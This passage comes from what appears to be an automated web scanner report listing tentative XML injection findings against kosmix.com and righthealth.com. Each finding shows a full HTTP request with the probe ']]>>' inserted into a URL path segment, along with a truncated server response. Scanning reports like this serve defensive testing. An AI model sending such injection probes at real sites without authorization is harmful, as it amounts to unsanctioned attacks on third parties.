Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:53 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:53 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:09:53 GMT;path=/
Content-Length: 16057

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.76. http://www.kosmix.com/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/favicon.ico]]>> HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:10 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:10 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:10:10 GMT;path=/
Content-Length: 16080

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.77. http://www.kosmix.com/images/mpv.txt [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/mpv.txt

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/mpv.txt?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&v=29&vt=any&pt=o&abt=82.YES*89.YES*25.YES*108.mashup*100.NO*92.NO*26.NO*15.NO*2.NO*60.NO*99.images_r2_msn*110.YES*97.NO*102.UP*78.YES*17.YES*35.NO*98.YES*75.NO*104.YES*106.YES*72.YES*86.YES*76.YES*58.YES*70.YES*71.YES*81.YES*96.YES*21.NO*88.YES*63.NO*109.NT*83.NO*16.YES*91.SNIP*74.NO*87.NO*84.YES*107.YES*68.YES*93.YES*77.NO*101.YES*62.BELOW*61.LEFT*67.YES*40.FIVE*103.NO*57.NO*66.YES*94.NO*80.NO*95.YES*53.YES*59.NO*85.FOUR*55.YES*20.NO&m=nfooter+x0+y896+w1120+h168+an+r1010200+c1+i31+rt10&e_pt=corp&e_at_st=May+15+13%3A00%3A43.273911&e_at_et=May+15+13%3A00%3A43.281166&e_madsense_headish=0&e_page_quality_score=0 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; __qca=P0-1290282890-1305489649089

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:14:50 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:14:50 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:16:50 GMT;path=/
Content-Length: 17055

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.78. http://www.kosmix.com/images/mpv.txt [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/mpv.txt

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/mpv.txt]]>>?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&v=29&vt=any&pt=o&abt=82.YES*89.YES*25.YES*108.mashup*100.NO*92.NO*26.NO*15.NO*2.NO*60.NO*99.images_r2_msn*110.YES*97.NO*102.UP*78.YES*17.YES*35.NO*98.YES*75.NO*104.YES*106.YES*72.YES*86.YES*76.YES*58.YES*70.YES*71.YES*81.YES*96.YES*21.NO*88.YES*63.NO*109.NT*83.NO*16.YES*91.SNIP*74.NO*87.NO*84.YES*107.YES*68.YES*93.YES*77.NO*101.YES*62.BELOW*61.LEFT*67.YES*40.FIVE*103.NO*57.NO*66.YES*94.NO*80.NO*95.YES*53.YES*59.NO*85.FOUR*55.YES*20.NO&m=nfooter+x0+y896+w1120+h168+an+r1010200+c1+i31+rt10&e_pt=corp&e_at_st=May+15+13%3A00%3A43.273911&e_at_et=May+15+13%3A00%3A43.281166&e_madsense_headish=0&e_page_quality_score=0 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; __qca=P0-1290282890-1305489649089

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:11 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:11 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:11 GMT;path=/
Content-Length: 17080

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.79. http://www.kosmix.com/images/pv.txt [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/pv.txt

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/pv.txt?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&sv=1220494746&q=&sr=organic&br=Chrome&os=Windows&ur=http%3A//www.kosmix.com/&rf=&sw=1920&sh=1200&vw=1136&vh=945&v=29&rs=May+15+13%3A00%3A43.165997&bid=152138&rid=GAMMA.REL.BLD.20110412 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:08 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:08 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:08 GMT;path=/
Content-Length: 16708

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.80. http://www.kosmix.com/images/pv.txt [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/pv.txt

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/pv.txt]]>>?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&sv=1220494746&q=&sr=organic&br=Chrome&os=Windows&ur=http%3A//www.kosmix.com/&rf=&sw=1920&sh=1200&vw=1136&vh=945&v=29&rs=May+15+13%3A00%3A43.165997&bid=152138&rid=GAMMA.REL.BLD.20110412 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:27 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:27 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:27 GMT;path=/
Content-Length: 16731

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.81. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/options_bottom-kosmix-sem-chimborazo-152138.js?1302902896 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:12 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:12 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:12 GMT;path=/
Content-Length: 15931

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.82. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_bottom-kosmix-sem-chimborazo-152138.js?1304862030 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:56 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:55 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:55 GMT;path=/
Content-Length: 16390

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.83. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js?1302902897 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:12 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:12 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:12 GMT;path=/
Content-Length: 15935

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.84. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_top-s_kosmix-chimborazo-152138.js?1302902895 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:37 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:37 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:37 GMT;path=/
Content-Length: 16367

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.85. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /stylesheets]]>>/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css?1304450611 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:04:41 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:04:41 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:06:41 GMT;path=/
Content-Length: 15934

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.86. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /c-javascripts]]>>/kapp_relevance.js?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:40 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:40 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:40 GMT;path=/
Content-Length: 20500

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.87. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /c-javascripts/kapp_relevance.js]]>>?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:09 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:09 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:23:09 GMT;path=/
Content-Length: 20520

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.88. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/health/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:28 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:28 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:28 GMT;path=/
Content-Length: 20296

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.89. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

